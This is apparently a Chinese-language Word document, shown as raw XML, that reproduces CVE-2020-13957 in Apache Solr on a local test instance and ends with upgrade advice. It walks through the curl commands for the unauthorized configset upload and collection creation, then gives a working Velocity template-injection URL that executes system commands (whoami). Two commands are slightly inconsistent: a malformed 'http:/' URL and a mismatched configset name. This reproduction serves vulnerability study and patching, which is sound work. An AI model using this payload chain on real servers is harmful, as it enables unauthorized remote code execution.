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D5A5" w14:textId="64CEA8B5" w:rsidR="00A50C32" w:rsidRDefault="008A6A1D" w:rsidP="008A6A1D">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="008A6A1D">
        <w:t>CVE-2020-13957：Apche Solr 未授权上传漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672B0BA2" w14:textId="2966E78E" w:rsidR="008A6A1D" w:rsidRPr="006F473F" w:rsidRDefault="008A6A1D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/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Solr是一个独立的企业级搜索应用服务器，它对外提供类似于Web-service的API接口。用户可以通过http请求，向搜索引擎服务器提交一定格式的XML文件，生成索引；也可以通过Http Get操作提出查找请求，并得到XML格式的返回结果。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCE0694" w14:textId="1E2A1410" w:rsidR="008A6A1D" w:rsidRDefault="008A6A1D" w:rsidP="008A6A1D">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742630A5" w14:textId="34CEEFC4" w:rsidR="008A6A1D" w:rsidRPr="006F473F" w:rsidRDefault="008A6A1D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/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2020年10月13日</w:t>
      </w:r>
      <w:r w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Apache Solr</w:t>
      </w:r>
      <w:r w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>发布公告</w:t>
      </w:r>
      <w:r w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>修复了</w:t>
      </w:r>
      <w:r w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ConfigSet API中存在的未授权上传漏洞</w:t>
      </w:r>
      <w:r w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>该漏洞被利用可导致远程代码执行</w:t>
      </w:r>
      <w:r w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D10993" w14:textId="3BA72356" w:rsidR="008A6A1D" w:rsidRDefault="008A6A1D" w:rsidP="008A6A1D">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>影响版本：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653CE59A" w14:textId="39DA059A" w:rsidR="008A6A1D" w:rsidRPr="006F473F" w:rsidRDefault="008A6A1D" w:rsidP="006F47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F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Apache Solr 6.6.0 -6.6.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E293E70" w14:textId="7C15AF32" w:rsidR="008A6A1D" w:rsidRPr="006F473F" w:rsidRDefault="008A6A1D" w:rsidP="006F47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F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Apache Solr 7.0.0 -7.7.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16037848" w14:textId="66EF1197" w:rsidR="008A6A1D" w:rsidRPr="006F473F" w:rsidRDefault="008A6A1D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/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Apache Solr 8.0.0 -8.6.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C82B494" w14:textId="2AF8D5D5" w:rsidR="008A6A1D" w:rsidRDefault="008A6A1D" w:rsidP="008A6A1D">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>复现过程：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E97D88" w14:textId="606A6A6B" w:rsidR="008A6A1D" w:rsidRPr="006F473F" w:rsidRDefault="008A6A1D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/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>olr版本：7</w:t>
      </w:r>
      <w:r w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D817FE8" w14:textId="5E54C815" w:rsidR="008A6A1D" w:rsidRPr="006F473F" w:rsidRDefault="008A6A1D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下载：</w:t>
      </w:r>
      <w:r w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://archive.apache.org/dist/lucene/solr/7.</w:t>
      </w:r>
      <w:r w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ECCB5E" w14:textId="56363009" w:rsidR="008A6A1D" w:rsidRPr="006F473F" w:rsidRDefault="008A6A1D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启动solr服务：</w:t>
      </w:r>
      <w:r w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>solr下bin目录</w:t>
      </w:r>
      <w:r w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>使用cmd执行命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F6059C" w14:textId="4AED1D20" w:rsidR="008A6A1D" w:rsidRPr="006F473F" w:rsidRDefault="008A6A1D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命令：</w:t>
      </w:r>
      <w:r w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>solr.cmd start -c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05832C12" w14:textId="77DDBB02" w:rsidR="008A6A1D" w:rsidRDefault="008A6A1D" w:rsidP="008A6A1D">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C210A33" wp14:editId="67A9199A">
            <wp:extent cx="5274310" cy="1658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3198" w14:textId="38DFBB89" w:rsidR="008A6A1D" w:rsidRDefault="008A6A1D" w:rsidP="008A6A1D">
      <w:r w:rsidRPr="008A6A1D">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E682B1E" wp14:editId="243C5042">
            <wp:extent cx="5274310" cy="2113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3C26" w14:textId="0CEB0008" w:rsidR="008A6A1D" w:rsidRPr="006F473F" w:rsidRDefault="008A6A1D" w:rsidP="006F47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修改</w:t>
      </w:r>
      <w:r w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>\server\solr\configsets\_default\conf</w:t>
      </w:r>
      <w:r w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>目录下</w:t>
      </w:r>
      <w:r w:rsidR="00A02070" w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>solrconfig.xml</w:t>
      </w:r>
      <w:r w:rsidR="00A02070" w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>文件，将默认的</w:t>
      </w:r>
      <w:r w:rsidR="00A02070" w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r w:rsidR="00A02070" w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>修改为true。然后将此目录下的文件都打包成一个zip文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DE02E7" w14:textId="66120427" w:rsidR="00A02070" w:rsidRDefault="00A02070" w:rsidP="00A02070">
      <w:r w:rsidRPr="00A02070">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2E99E5F4" wp14:editId="3E6FE787">
            <wp:extent cx="5274310" cy="565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B67" w14:textId="74D2FBFE" w:rsidR="00A02070" w:rsidRDefault="00A02070" w:rsidP="00A02070">
      <w:r w:rsidRPr="00A02070">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0729685D" wp14:editId="35BCB9A4">
            <wp:extent cx="5274310" cy="736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3369" w14:textId="3AB2C3B0" w:rsidR="00A02070" w:rsidRDefault="00A02070" w:rsidP="00A02070">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A02070">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="770A06F5" wp14:editId="0AA446B8">
            <wp:extent cx="5274310" cy="2126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4AD9" w14:textId="0D61AA63" w:rsidR="00A02070" w:rsidRPr="006F473F" w:rsidRDefault="00A02070" w:rsidP="006F47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然后将zip文件上传</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147AB7A8" w14:textId="658623D8" w:rsidR="00A02070" w:rsidRPr="006F473F" w:rsidRDefault="00A02070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命令：</w:t>
      </w:r>
      <w:r w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>curl -X POST --header "Content-Type:application/octet-stream" -</w:t>
      </w:r>
      <w:r w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>-data-binary</w:t>
      </w:r>
      <w:r w:rsidR="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>@conf.zip http://127.0.0.1:8983/solr/admin/configs?action=UPLOAD&amp;name=file1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B9A36E" w14:textId="28B53607" w:rsidR="00A02070" w:rsidRDefault="00A02070" w:rsidP="00A02070">
      <w:r w:rsidRPr="00A02070">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6C304B3A" wp14:editId="00431625">
            <wp:extent cx="5274310" cy="20116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60F1" w14:textId="65B4750C" w:rsidR="00F400EE" w:rsidRPr="006F473F" w:rsidRDefault="00F400EE" w:rsidP="006F47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创建一个新的配置，</w:t>
      </w:r>
      <w:r w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>绕过不能通过直接</w:t>
      </w:r>
      <w:r w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>UPLOAD创建collection的限制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDB9C88" w14:textId="34AF8400" w:rsidR="00F400EE" w:rsidRPr="006F473F" w:rsidRDefault="00F400EE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命令：</w:t>
      </w:r>
      <w:r w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>curl "http:/127.0.0.1:8983/solr/admin/configs?action=CREATE&amp;name=file3&amp;baseConfigSet=file1&amp;configSetProp.immutable=false&amp;wt=xml&amp;omitHeader=true"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C67B3D7" w14:textId="04A7FB6C" w:rsidR="00F400EE" w:rsidRDefault="00F400EE" w:rsidP="00F400EE">
      <w:r w:rsidRPr="00F400EE">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5C17255C" wp14:editId="7C593089">
            <wp:extent cx="5274310" cy="8210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1741" w14:textId="26DC30A6" w:rsidR="00F400EE" w:rsidRPr="006F473F" w:rsidRDefault="00F400EE" w:rsidP="006F47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根据</w:t>
      </w:r>
      <w:r w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CREATE得到的新configset创建恶意collection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68430859" w14:textId="4686F935" w:rsidR="00F400EE" w:rsidRPr="006F473F" w:rsidRDefault="00F400EE" w:rsidP="006F47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命令：</w:t>
      </w:r>
      <w:r w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>curl "http:/127.0.0.1:8983/solr/admin/collections?action=CREATE&amp;numShards=1&amp;name=file2&amp;collection.configName=file4"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B918CC7" w14:textId="70CEB80E" w:rsidR="00F400EE" w:rsidRDefault="00F400EE" w:rsidP="00F400EE">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3359DF25" wp14:editId="3A45E7D9">
            <wp:extent cx="5274310" cy="1645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DE8E" w14:textId="60C812A2" w:rsidR="00F400EE" w:rsidRPr="006F473F" w:rsidRDefault="00A37450" w:rsidP="006F47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利用创建好的</w:t>
      </w:r>
      <w:r w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>恶意</w:t>
      </w:r>
      <w:r w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>collection</w:t>
      </w:r>
      <w:r w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>进行命令执行</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767FB195" w14:textId="021A0078" w:rsidR="00A37450" w:rsidRPr="006F473F" w:rsidRDefault="00A37450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命令：</w:t>
      </w:r>
      <w:r w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>http://127.0.0.1:8983/solr/file2/select?q=1&amp;&amp;wt=velocity&amp;v.template=custom&amp;v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27whoami%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58604F6B" w14:textId="118D362D" w:rsidR="00A37450" w:rsidRDefault="00A37450" w:rsidP="00A37450">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D2DA175" wp14:editId="43DD081E">
            <wp:extent cx="5274310" cy="7854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1690" w14:textId="2B2F9DC2" w:rsidR="00A37450" w:rsidRPr="006F473F" w:rsidRDefault="00A37450" w:rsidP="006F47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F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>solr could界面</w:t>
      </w:r>
      <w:r w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>可以看到上传的文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF2F7EF" w14:textId="0CEE6BD4" w:rsidR="00A37450" w:rsidRDefault="00A37450" w:rsidP="00A37450">
      <w:r w:rsidRPr="00A37450">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68C2FB2F" wp14:editId="79AA14D7">
            <wp:extent cx="5274310" cy="4122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50E6" w14:textId="77C325C9" w:rsidR="00A37450" w:rsidRDefault="00A37450" w:rsidP="00A37450">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>修复建议：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384F4700" w14:textId="77777777" w:rsidR="00A37450" w:rsidRPr="006F473F" w:rsidRDefault="00A37450" w:rsidP="006F473F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="006F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>升级到最新版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148D97DE" w14:textId="5463A7AF" w:rsidR="00A37450" w:rsidRPr="006F473F" w:rsidRDefault="00A37450" w:rsidP="006F47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F473F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://archive.apache.org/dist/lucene/solr/</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00A37450" w:rsidRPr="006F4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C2147"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2B108D50"/>
    <w:lvl w:ilvl="0" w:tplc="FF74A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3D0F95"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3E6C3994"/>
    <w:lvl w:ilvl="0" w:tplc="7B0E5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0"/>
    <w:rsid w:val="00583F30"/>
    <w:rsid w:val="006F473F"/>
    <w:rsid w:val="008A6A1D"/>
    <w:rsid w:val="00A02070"/>
    <w:rsid w:val="00A37450"/>
    <w:rsid w:val="00A50C32"/>
    <w:rsid w:val="00F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534F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{ED567F7E-05FA-4F2D-A0B7-E30092EF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6A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6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A6A1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A6A1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A6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</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>fzh</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-10-22T05:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-10-22T07:00:00Z</dcterms:modified>
</cp:coreProperties>
</file>